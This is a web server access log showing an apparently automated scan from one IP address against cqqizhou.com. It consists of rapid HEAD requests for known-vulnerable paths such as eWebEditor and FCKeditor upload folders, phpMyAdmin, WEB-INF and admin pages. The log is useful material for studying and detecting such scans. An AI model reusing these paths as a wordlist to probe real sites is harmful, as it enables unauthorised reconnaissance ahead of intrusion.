121.42.253.62 - - [07/Sep/2025:06:34:24 +0800] "HEAD /aspnet_client/system_web/2_0_50727 HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /ewebeditornet HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /intraAdmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/intraAdmin" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /admin/editor/admin HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/editor/admin" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /fund HTTP/1.1" 499 0 "http://www.cqqizhou.com/fund" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /intraAdmin/phpmyadmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/intraAdmin/phpmyadmin" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /system/eWebEditor/admin HTTP/1.1" 499 0 "http://www.cqqizhou.com/system/eWebEditor/admin" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /shsjms HTTP/1.1" 499 0 "http://www.cqqizhou.com/shsjms" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /aspnet_client/system_web HTTP/1.1" 499 0 "http://www.cqqizhou.com/aspnet_client/system_web" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /s_admin HTTP/1.1" 499 0 "http://www.cqqizhou.com/s_admin" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /webadmin/htmledit HTTP/1.1" 499 0 "http://www.cqqizhou.com/webadmin/htmledit" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /web/downloads HTTP/1.1" 499 0 "http://www.cqqizhou.com/web/downloads" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /system/eWebEditor HTTP/1.1" 499 0 "http://www.cqqizhou.com/system/eWebEditor" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /eWebEditorNet/UploadFile HTTP/1.1" 499 0 "http://www.cqqizhou.com/eWebEditorNet/UploadFile" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /admin/wo%255Fedit HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/wo%255Fedit" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /admin/editor/include HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/editor/include" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /fckeditor/dialog HTTP/1.1" 499 0 "http://www.cqqizhou.com/fckeditor/dialog" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /syssite/install HTTP/1.1" 499 0 "http://www.cqqizhou.com/syssite/install" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /syssite/shopadmin HTTP/1.1" 499 0 "http://www.cqqizhou.com/syssite/shopadmin" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /fckEditor/editor HTTP/1.1" 499 0 "http://www.cqqizhou.com/fckEditor/editor" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /dmtbdata HTTP/1.1" 499 0 "http://www.cqqizhou.com/dmtbdata" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /system/eWebEditor/asp HTTP/1.1" 499 0 "http://www.cqqizhou.com/system/eWebEditor/asp" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /admin/editor/UploadFile HTTP/1.1" 499 0 "http://www.cqqizhou.com/admin/editor/UploadFile" "Go-http-client/1.1"
121.42.253.62 - - [07/Sep/2025:06:34:25 +0800] "HEAD /WEB-INF HTTP/1.1" 499 0 "http://www.cqqizhou.com/WEB-INF" "Go-http-client/1.1"
